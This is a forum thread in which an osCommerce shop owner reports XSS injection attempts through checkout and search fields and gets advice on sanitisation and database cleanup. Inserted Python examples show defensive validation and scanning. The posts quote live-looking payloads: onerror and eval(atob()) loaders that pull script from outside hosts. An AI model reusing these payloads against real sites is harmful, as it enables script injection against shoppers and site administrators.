puggybelle

Hack attempt - is there a way to prevent this?


Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
Ithaca
Ithaca, New York 98765
United States

I've changed the name and address for this post, as the street address, city, state and zip code they provided are legit.

They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name.

The order process email it generated bounced back to me as undeliverable:

A message that you sent contained one or more recipient addresses that were
incorrectly constructed:

  "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")

This address has been ignored. There were no other addresses in your
message, and so no attempt at delivery was possible.

Is there a way to prevent that?  Stop someone from proceeding when adding garbage in the name and address fields? 

And...can someone tell me what it is they're trying to accomplish by doing this?  Thanks!

- Andrea
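Two things in the post above are worth separating: the store let a name field through that contained quotes, `=` and a stripped `<script` tag, and the order email then bounced because that name was pasted into the `To:` header by plain string concatenation (the `"Bob Smith"__sCRiPt ..." <...>` line in the bounce is exactly that). The block below is an added example, not osCommerce or PWA code, written in Python to show both points: a field validator that stops a checkout when a name or address contains characters that only make sense in markup, and a header builder that quotes and escapes the display name so a stray `"` can no longer break the recipient. The forbidden-character set, the length limit and the `attacker.invalid` host are assumptions chosen for the example.

```python
import re
from email.utils import formataddr, parseaddr

# Constructed example, not osCommerce code. Characters a buyer has no reason to
# put in a name or street address but which are needed to build HTML tags,
# attributes or mail-header syntax. Apostrophes and hyphens stay allowed.
FORBIDDEN_CHARS = set('<>"=;\\`{}[]|$%')
MAX_FIELD_LENGTH = 64  # assumed limit for a single name/address line
# Tokens that survive tag stripping: the post shows "__sCRiPt" once "<" is gone.
SCRIPT_TOKENS = re.compile(
    r"script|on(?:error|focus|load)\s*=|eval\s*\(|atob\s*\(", re.IGNORECASE
)


def validate_contact_field(value: str, max_length: int = MAX_FIELD_LENGTH) -> list[str]:
    """Return the problems found in a name/address field; [] means it may proceed."""
    problems = []
    if not value.strip():
        problems.append("empty")
    if len(value) > max_length:
        problems.append(f"longer than {max_length} characters")
    bad = sorted(set(value) & FORBIDDEN_CHARS)
    if bad:
        problems.append("forbidden characters: " + " ".join(bad))
    if SCRIPT_TOKENS.search(value):
        problems.append("script-like token")
    return problems


def naive_recipient(name: str, address: str) -> str:
    """String concatenation, the pattern behind the bounce: a '"' inside the
    name closes the quoted display name early and leaves the rest unbalanced."""
    return f'"{name}" <{address}>'


def safe_recipient(name: str, address: str) -> str:
    """Quote the display name and backslash-escape any '"' or '\\' inside it,
    so the mailer sees one well-formed mailbox whatever the buyer typed."""
    return formataddr((name, address))


def parse_recipient(header: str) -> tuple[str, str]:
    """(display name, address) as a mail library would read the header back."""
    return parseaddr(header)


if __name__ == "__main__":
    # Constructed input mirroring the post, with a placeholder host.
    name = 'Bob Smith"__sCRiPt sRC=//attacker.invalid/i__/sC'
    print(validate_contact_field(name))
    print(naive_recipient(name, "buyer@example.com"))
    print(safe_recipient(name, "buyer@example.com"))
```

Rejecting the field at checkout is the cheap fix; the header escaping matters independently, because a legitimate buyer with a `"` in their name would otherwise bounce the same way.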


Yes, it's quite simple: they are trying to get you to save this to your db. They know if they use your form and finish, osC will save to db, and that is what they do to get into the db.

You should delete the account and clear the crap from the db.

What they were trying to do? Who knows!

Edited by JcMagpie

18 minutes ago, JcMagpie said:

clear the crap from the db.

Can you be a little more specific?  I deleted the order - no account existed.

I found some interesting info online when searching a bit deeper.  The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. 

Google the phrase Linda Juan Fraud and see what comes up.  Guess it was just my turn!  Hope they send cash...

- Andrea


@puggybelle

As I understand it, osC has filters in place to prevent 'customers' from entering injection code when filling out forms. You did say that you are using PWA. While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code.

That said, IIRC, the latest version of PWA is supposed to delete any customer record after the 'guest' checks out. I'm pretty sure that's why no 'customer' account exists.

M


Get the latest Responsive osCommerce CE (community edition) here.

16 minutes ago, ArtcoInc said:

While I have not looked into the latest version of PWA, it too should have filters in place to prevent injection code from being entered. If not, this needs to be brought to the attention of the people maintaining the code.

PWA uses exactly the same code that sanitizes customer input to store the customer's data in the database, like the core create account page. So it is as safe as the core create account in that sense.

Edited by raiwa


@raiwa

Thank you for that clarification. Can you explain then how the injection code ended up in the orders record? Or, is that an issue with her version of osC not sanitizing the customer input in the orders record?

M



I always forget to say which version I'm using.

I'm using 2.3.4.1 CE with the latest version of PWA.

- Andrea


@puggybelle

Unfortunately, the Community Edition version of osC does not have an accurate version number system. Do you know if you are using 'Frozen'? Or a version of 'Edge'? The only way to really know which version you have is to look at the date of the original code package.

M



FWIW, 'Frozen' was released on Aug 31, 2018. Additional work continues to be done under the 'Edge' name.

M



Is there anything I need to do?

When I run Version Checker in Admin, it comes back with:

[screenshot: Version Checker output (version.PNG)]

- Andrea


@puggybelle

(while off topic ...)

As I said, the Community Edition does not have an accurate version numbering system.

When Burt started this project back in 2014, osC was at version 2.3.3.4. So, the Community Edition, all through its early development, was also v2.3.3.4. Every release during these early times was called v2.3.3.4.

When osC upgraded to v2.3.4, Burt brought the Community Edition code base up to the v2.3.4 code base, and the Community Edition stayed at v2.3.4 while further development was happening. Somewhere during this time, Burt released the 'Gold' fixed release. Development still continued, with every release still being called v2.3.4.

When osC had the v2.3.4.1 Hot Patch applied, Burt also applied the Hot Patch, and the Community Edition was bumped up to v2.3.4.1. Once again, development continued, with every new release still being called v2.3.4.1.

Burt released the 'Frozen' fixed release in August, 2018. Development still continues (usually called 'Edge', although that is not a fixed release), and the version number is *still* v2.3.4.1.

Some bugs have been identified in 'Frozen', and there is a thread here on the forum identifying them (and some fixes too). 'Edge' continues to be developed (still being called v2.3.4.1), and some significant changes have been made since 'Frozen', causing some compatibility issues with prior versions, and many (most?) add-ons out there.

This all said ...

You can download the 'Frozen' version (see the link in my signature below). *** IF *** you have made NO core changes, you *should* be able to drop the 'Frozen' version into your store. Otherwise, you will need to use a file compare application to see what changes have been made since your release.

(now, to get back on topic ...)

How this all relates to your initial problem, I don't know. Someone with a higher pay grade than myself will need to explore how the injection code made its way into your orders record.

M


Get the latest Responsive osCommerce CE (community edition) here.

6 hours ago, puggybelle said:

Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC

When the form is submitted, the commands are stripped from it. That is why you see the __script instead of <script. That renders the code useless as far as the hacker is concerned. At least it should. I never assume anything when they are involved.

If you have an addon that records the IP, like View Counter or IP Blocker, then you should block the IP. That won't prevent others from using the same method but it might stop that guy.


@ArtcoInc

Well, this is just a mess!  My core code has been modified substantially, so...I have a lot to think about now.  But, Thank You for helping!

@Jack_mcs

Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form.  The part where buyers can add any additional comments with their purchase.  But, the < > tags have been stripped.  Looks like this:

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that.  I bet someone in this forum knows...

I will take comfort in knowing that the code is being sanitized and just leave it at that.  This hacker nonsense is crazy and worse than ever.

Thanks to everyone who posted - I appreciate it very much!

- Andrea


I would say you still need to clean your db of any remnants of the injected script. The sanitiser is not 100%! Hackers know how this is done and add redundant characters to fool it.

Manually clean the db, then run a virus scanner on the server if you can, or tell your host the script has been injected.

You "MAY" have to restore db and/or site from backups before the injection if they find it has spread.


This is only appearing in this one order's data, and is not in everyone's (or in your osC code)? They are definitely trying to provoke your server into running what's presumably some nasty script code, but it's being disabled by osC. If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit. Unless you want to jump through the hoops of reporting them to the payment processor. If everyone is seeing this, you've got some cleanup to do and security holes to patch.

They're trying to inject and run some script code that creates more script, invisible images, and input field elements on your page. Some server in Guyana (they have computers there???) is involved (perhaps to load more malicious code). I haven't dived more deeply into it, but it looks like something you don't want running. Just be thankful it was (apparently) disabled before it could do the nasty.


If you are running the "official" osC 2.3.4 or 2.3.4.1 download, your installation is obsolete! Get (stable) Frozenpatches or (unstable) Edge. See also the naming convention and the latest community-supported responsive "Edge" release

13 hours ago, puggybelle said:

It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that.

The jb.gy is a link to the hacker site. The gy is the TLD for Guyana. Once the full code is in your database, the hacker could access and load whatever from his site.

If your host offers country blocking, or if you have View Counter installed, then you should block Guyana, assuming you would not sell to anyone from there, along with any other country you won't sell to.


I'm not so sure the script was stopped! Decoding what @puggybelle posted, most of it looks untouched and may still be active. If I decoded correctly, and it looks as if I did, I get:

_/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_
_/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var=document.createElement("script");b.src="http://jb.gy/"+Math.random();(document.getElementsByTagName("HEAD")[]||document.body).appendChild();/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

As you see, most of the hexadecimal was left unstripped and works.

I think it's active and still valid and will need to be rooted out of the site, but I could be wrong! You can never be sure about these bits of *~##ity scripts.
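JcMagpie's two posts above (clean the db of remnants; decode what was posted before deciding it is harmless) and the webhost's later find of three `jb.gy` patterns in the `sessions` table all come down to the same task: search every buyer-supplied text column for injection markers, after undoing the URL-encoding and the base64 `id=` trick that hide them from a plain `LIKE '%script%'`. The block below is an added example, not osCommerce code, in Python against an in-memory SQLite stand-in for the shop database. The table and column names resemble osC's `orders` and `sessions` tables but are assumptions, the rows are constructed, and `attacker.invalid` is a placeholder host; a real scan would point the same functions at the live MySQL connection.

```python
import base64
import re
import sqlite3
from urllib.parse import unquote

# Markers that survive tag stripping (the post shows "__sCRiPt" once "<" is
# removed) plus the handler and decoder names the quoted payload relies on.
MARKERS = re.compile(
    r"script|onerror|onfocus|onload|eval\(|atob\(|createElement|appendChild|javascript:",
    re.IGNORECASE,
)
# A base64-looking id= attribute: the payload stores code there and decodes it
# with atob() at runtime, so the stored text carries no obvious keyword.
B64_ATTR = re.compile(r"id=([A-Za-z0-9+/=]{20,})")


def decode_layers(text: str) -> str:
    """Return the text with URL-encoding undone and any base64 id= values decoded
    and appended, so markers hidden by either layer become searchable."""
    decoded = unquote(text)
    for blob in B64_ATTR.findall(decoded):
        try:
            decoded += " " + base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            pass  # not really base64; leave it alone
    return decoded


def scan_table(conn, table, key_column, text_columns):
    """Yield (table, key, column, markers) for every text cell that matches."""
    cols = ", ".join(text_columns)
    for key, *values in conn.execute(f"SELECT {key_column}, {cols} FROM {table}"):
        for column, value in zip(text_columns, values):
            if not isinstance(value, str):
                continue
            found = {m.group(0).lower() for m in MARKERS.finditer(decode_layers(value))}
            if found:
                yield table, key, column, sorted(found)


def find_injections(conn):
    """Scan the tables where buyer-supplied text lands (names are assumptions)."""
    hits = []
    hits += scan_table(conn, "orders", "orders_id",
                       ["customers_name", "delivery_street_address"])
    hits += scan_table(conn, "sessions", "sesskey", ["value"])
    return hits


def build_sample_db():
    """In-memory stand-in for the shop database with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders (orders_id INTEGER PRIMARY KEY,
                             customers_name TEXT, delivery_street_address TEXT);
        CREATE TABLE sessions (sesskey TEXT PRIMARY KEY, value TEXT);
    """)
    # Constructed base64 attribute value, decoded only to show the marker inside.
    b64 = base64.b64encode(b'var a=document.createElement("script");').decode()
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        (1001, "Jane Doe", "12 Elm St"),
        (1002, 'Bob Smith"__sCRiPt sRC=//attacker.invalid/i__/sC',
               '244 Whatever St"__sCRiPt sRC=//attacker.invalid/i__/sCrIpT_'),
    ])
    conn.executemany("INSERT INTO sessions VALUES (?, ?)", [
        ("abc", "%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28this.id%29%29%3E"),
        ("def", f"input onfocus=eval(atob(this.id)) id={b64} autofocus"),
        ("ghi", 'cart|a:1:{i:0;s:2:"42";}'),  # an ordinary serialized session
    ])
    return conn


if __name__ == "__main__":
    for hit in find_injections(build_sample_db()):
        print(*hit)
```

Session rows deserve the same treatment as order rows: the session store keeps the raw form input for as long as the session lives, which is why the host found the remnants there and not in a file.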

12 hours ago, MrPhil said:

If it's just this one guy, cancel any payment made (so you're not in legal trouble for keeping payment and not delivering) and cancel the order, and fuhgettaboudit

They checked out using the checks/money order selection so no worries about payment or delivery.  And I sincerely hope that this is a one-off thing and all will be well.

I have contacted my webhost with full details and am awaiting a response now. 

Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it.  This crap is really scary, you know?

3 hours ago, JcMagpie said:

I think it's active and still valid and will need to be rooted out of the site, but I could be wrong!

Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now.  I haven't the faintest idea how to go about manually cleaning the database.  Hopefully, they'll find nothing and I can forget about it. 

 

10 hours ago, Jack_mcs said:

If your host offers country blocking, or if you have View Counter installed, then you should block Guyana,

My host does NOT offer country blocking.  I had View Counter installed for a brief time, back when I had SEO-G URLs running, but there was some conflict and I ended up uninstalling View Counter.  In retrospect, it should have been the other way around.  I now use Ultimate SEO URLs.  Live and learn, I guess.

I'll post back with any response I get from the webhost.  Hopefully, everything is okay.  Thanks all!

- Andrea


Okay, here's where I'm at.

Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them.

No new files had been added to the website.

And just encouragement to upgrade my installation to the 'frozen' version, I think it's called.  And that's what I thought I had!

Oh, well.  Work to do but it didn't turn out to be a disaster.  Think I will give View Counter another look, though...

If I have to block half the world, I'll do it!  Thanks everybody!

- Andrea


If you often visit unknown sites, I recommend then to use a VPN software for your security, because your private data can be stolen in any moment. 

Edited by kymation
Link not allowed

On 1/8/2019 at 6:00 PM, puggybelle said:

Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

I had a similar incident, where someone created an account with a script, no order was placed tho...  but after doing checks nothing seems to have been changed, think I've been let off this time...

Would you suggest using website security/firewall like siteguarding or sucuri would help prevent future issues like this?

Thank you in advance.

 

Edited by pete2007

15 minutes ago, pete2007 said:

I had a similar incident, where someone created an account with a script, no order was placed tho

It's a very common thing for all database sites. See this thread for suggestions.


I want to report that I had another hack attempt this week - this time, thru the Search box.  Apparently, there's no limit to what can be entered in the search field.

I use an old contrib that I cleaned up called Keyword Search Report and when I looked at it yesterday, it was hysterical.

Huge chunks of malicious code.  Wish I had taken a screenshot of it, but I was so ticked off I immediately deleted the report and checked the database.

I have since edited all files containing the Search form and put a maxlength="60" in all of them.

catalog > advanced_search.php

catalog > includes > modules > boxes > bm_search.php

catalog > includes > modules > content > header > cm_header_search.php

If I'm missing something, please let me know.  This hacker crap is insane!

- Andrea
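A `maxlength` on the search form is a reasonable first step, but the attribute lives in the browser: anyone posting the form directly skips it, so the same limit has to be applied again on the server before the keywords are searched or written to a report. The other half of the risk in the post above is the report itself, since an admin page that prints stored keywords unescaped is where a stored payload would finally run. The block below is an added example, not osCommerce or Keyword Search Report code, in Python: a server-side twin of the 60-character limit, a counter that stores the normalised text, and a renderer that escapes at output time. The report structure is an assumption for the example.

```python
import html
import re

# The limit the post put on the search forms as maxlength="60", applied here
# on the server because the client-side attribute is easily bypassed.
MAX_KEYWORDS = 60


def normalise_keywords(raw: str, max_length: int = MAX_KEYWORDS) -> str:
    """Drop control characters, collapse whitespace and truncate to the limit."""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", " ", raw)
    cleaned = " ".join(cleaned.split())
    return cleaned[:max_length]


def record_search(report: dict, raw: str) -> str:
    """Count one search in the keyword report; only the normalised text is kept."""
    keywords = normalise_keywords(raw)
    if keywords:
        report[keywords] = report.get(keywords, 0) + 1
    return keywords


def render_report(report: dict) -> str:
    """HTML rows for the admin report, most frequent first. Stored text is
    escaped at output time, so whatever was typed is displayed, never parsed."""
    rows = [
        f"<tr><td>{html.escape(keywords)}</td><td>{count}</td></tr>"
        for keywords, count in sorted(report.items(), key=lambda kv: -kv[1])
    ]
    return "\n".join(rows)


if __name__ == "__main__":
    # Constructed searches: two ordinary ones and one injection attempt.
    report = {}
    for term in ["red widget", "red widget", "<img src=x onerror=eval(atob(this.id))>"]:
        record_search(report, term)
    print(render_report(report))
```

Keeping the raw text (truncated) rather than trying to strip tags out of it is deliberate: the report stays useful as evidence of what was attempted, and escaping on output makes it safe to look at.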

9 minutes ago, puggybelle said:

Huge chunks of malicious code. 

Sorry? Where were these huge chunks of code???????

If the code was in a file on your server - you have a HUGE issue... that is nothing to do with the file itself.

Edited by greasemonkey
typo
